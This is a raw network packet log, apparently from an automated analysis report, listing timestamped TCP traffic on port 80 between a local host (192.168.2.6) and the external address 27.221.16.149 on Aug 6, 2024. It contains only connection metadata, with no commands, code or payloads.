                                                                                                                                    Aug 6, 2024 10:29:28.554290056 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.554310083 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.554327965 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.555150032 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.555160999 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.555177927 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.555191040 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.555192947 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.555222034 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.555821896 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.555857897 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.555875063 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.598740101 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.884752035 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.884768963 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.884788036 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.884813070 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.884824038 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.884835005 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.884860992 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.884895086 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.884938955 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.885685921 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.885705948 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.885715961 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.885727882 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.885762930 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.885787010 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.886358976 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.886445045 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:28.886459112 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:28.926785946 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.228584051 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.228606939 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.228624105 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.228635073 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.228645086 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.228655100 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.228666067 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.228739977 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.228777885 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.229465008 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.229485989 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.229497910 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.229509115 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.229531050 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.229547024 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.230140924 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.230159044 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.230201006 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.572565079 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.572592974 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.572606087 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.572619915 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.572635889 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.572809935 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.573121071 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.573172092 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.573180914 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.573185921 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.573232889 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.573259115 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.573270082 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.573307991 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.573827028 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.573872089 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.573926926 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.915999889 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.916028023 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.916038990 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.916064978 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.916121006 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.916135073 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.916191101 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.916364908 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.916382074 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.916393042 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.916414976 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.916423082 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.916444063 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.916994095 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.917006016 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.917016983 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.917026997 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:29.917045116 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:29.917078018 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.003582001 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.051767111 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.246982098 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247011900 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247024059 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247037888 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247055054 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247065067 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247144938 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.247450113 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247522116 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247540951 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247559071 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247565985 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.247570992 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247585058 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.247596979 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.247621059 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.334300041 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.380018950 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.590800047 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.590912104 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.590962887 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.590971947 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.590996981 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.591032028 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.591042042 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.591065884 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.591099024 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.591109037 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.591144085 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.591221094 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.591738939 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.591849089 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.591898918 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.592031002 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.592093945 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.592128038 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.592144012 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.645500898 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.934576035 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.934612036 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.934623957 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.934634924 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.934645891 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.934658051 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.934696913 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.934741020 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.934984922 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.934997082 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.935009003 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.935048103 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.935058117 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.935082912 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.935094118 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:30.935105085 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:30.935137033 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:31.278676033 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.278707027 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.278718948 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.278728962 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.278739929 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.278749943 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.278837919 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:31.278881073 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:31.279045105 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.279056072 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.279067039 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.279102087 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:31.279551029 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.279561996 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.279594898 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.279603004 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:31.279606104 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.279618025 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.279640913 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:31.279659986 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:31.366049051 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:31.411130905 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.554481030 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554677010 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554689884 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554701090 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554712057 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554749966 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554752111 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.554759979 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554770947 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554795980 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554801941 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.554825068 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554831028 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.554836988 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554856062 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554867029 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554871082 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.554879904 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554893017 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.554894924 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.554919958 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.554943085 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.555188894 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.555409908 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.555454969 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.557677031 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.557729006 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.560571909 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.560584068 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.560605049 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.560622931 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.560633898 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.560645103 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.560656071 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.560709000 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.561156034 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.561173916 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.561184883 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.561208010 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.561229944 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.561242104 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.561247110 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.561256886 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.561283112 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.562755108 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.562767982 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.562830925 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.579979897 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.580069065 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.820986986 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821016073 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821033955 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821048975 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821063995 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821079969 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821109056 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.821154118 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.821275949 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821316004 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821330070 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821362972 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.821403980 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821419001 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821433067 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.821453094 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.821465969 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.822490931 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.822508097 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.822562933 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:32.908324957 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:32.958121061 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:33.164740086 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.164762020 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.164768934 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.164773941 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.164781094 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.164786100 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.165054083 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.165102005 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.165112972 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.165116072 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:33.165175915 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:33.165175915 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.165189981 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.165201902 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.165210009 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:33.165239096 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:33.165996075 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.166009903 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.166079044 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:33.252054930 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.301804066 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:33.508459091 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.508682013 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:33.513880014 CEST804973927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:33.513986111 CEST4973980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:34.075167894 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:34.080106020 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:34.080188036 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:34.080423117 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:34.085361958 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.410968065 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.410988092 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.411001921 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.411015987 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.411031008 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.411048889 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.411078930 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.411091089 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.411102057 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.411113024 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.411112070 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:35.411195993 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:35.416002989 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.416018009 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.416023970 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.416089058 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:35.739149094 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.739168882 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.739190102 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.739201069 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.739212036 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.739223003 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.739234924 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.739408016 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:35.740008116 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.740020990 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.740031958 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.740042925 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.740068913 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:35.740103006 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:35.740670919 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.740724087 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:35.740897894 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:35.786226988 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:36.015439034 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:36.015465021 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:36.015477896 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:36.015489101 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:36.015501022 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:36.015552044 CEST4975180192.168.2.627.221.16.149
